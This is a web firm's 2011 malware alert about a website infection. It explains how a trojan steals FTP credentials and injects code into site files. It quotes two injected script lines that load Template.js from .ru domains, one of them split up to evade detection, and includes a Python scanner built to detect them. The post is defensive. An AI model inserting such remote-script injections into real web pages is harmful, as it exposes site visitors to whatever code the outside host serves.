New malware alert - pocketbloke.ru, inkrainbow.ru and pantsletter.ru

We've had a number of calls over the last week from people whose websites have been infected with a new virus, and not much seems to be known about it. Wintercorn now have a huge wealth of experience in detecting and disinfecting this particular virus.

The virus adds a line of code to your website's index, default and JavaScript files and, although it seems dormant at the moment, may become active at any time. It's therefore essential that your site is disinfected as soon as the infection is detected.

Here's how it works.
  • You probably use an FTP client like FileZilla to manage your website.
  • You visit an infected site and this downloads a trojan virus to your computer.
  • This trojan will search your PC for your FTP username and password files and then send them to another server, probably in Russia.
  • Your websites will then be infected with this JavaScript virus and execute its payload, whatever that might be. At the moment the .ru sites in the code are apparently not functional, but when they start working they could either download further viruses to visitors' computers or add links to spam advertising sites. We just don't know at this time.
The injected code looks like this:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script> <!--3848d52fcd665b3d7d96c22e5b6a2125-->


and this:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Template.js"></scri'+'pt>');
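
One way to check a downloaded copy of your site for the two injected lines shown above (an added example, not part of the original post and not Wintercorn's own tooling). The list of file extensions, the 32-hex-character marker format and the rule that flags Template.js on other hosts are assumptions.

```python
import re
import sys
from pathlib import Path

# Domains named in this post; the "other-template-js" rule below is an assumption
# that further domains would reuse the same file name.
KNOWN_DOMAINS = ("pocketbloke.ru", "inkrainbow.ru", "pantsletter.ru")
# Assumption: extensions that cover index, default and JavaScript files.
SCAN_SUFFIXES = {".html", ".htm", ".php", ".asp", ".aspx", ".js"}

# Joins split string literals, so '<sc'+'ript' is read as '<script'.
CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")
SCRIPT_SRC = re.compile(
    r"""<script[^>]*\bsrc\s*=\s*["']?https?://([^/"'\s>]+)/Template\.js""", re.I)
# Assumption: the trailing comment is always 32 hex characters, as in the sample.
MARKER = re.compile(r"<!--[0-9a-f]{32}-->", re.I)


def classify_line(line):
    """Return the reasons a line resembles the injected code (empty list if none)."""
    reasons = []
    match = SCRIPT_SRC.search(CONCAT.sub("", line))
    if match:
        host = match.group(1).lower()
        kind = "known-domain" if host in KNOWN_DOMAINS else "other-template-js"
        reasons.append(f"{kind}:{host}")
    if MARKER.search(line):
        reasons.append("hex-marker")
    return reasons


def scan_tree(root):
    """Walk a local copy of the site; return (path, line number, reasons) tuples."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for number, line in enumerate(text.splitlines(), 1):
            reasons = classify_line(line)
            if reasons:
                findings.append((str(path), number, reasons))
    return findings


if __name__ == "__main__":
    for path, number, reasons in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}:{number}: {', '.join(reasons)}")
```

Run it against a local copy of the site, passing the folder as the first argument; each hit is printed as file, line number and the reason it was flagged.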


We have cleaned over 25 sites in the last week for website owners who have noticed the infection. There are likely to be many, many more who don't even know if their site is infected yet.

It can take some time to completely clean a website of all embedded code so if you have this infection, or you think you do, then please contact us today and we can quote a competitive price for complete removal.

In the meantime, please change all of your website passwords, ensure that your anti-virus protection is up to date and that you have an anti-malware system installed, and stop saving passwords in your FTP client to prevent further infections.

Hosted by JoomlaPipe Copyright  © Wintercorn 2003 - 2011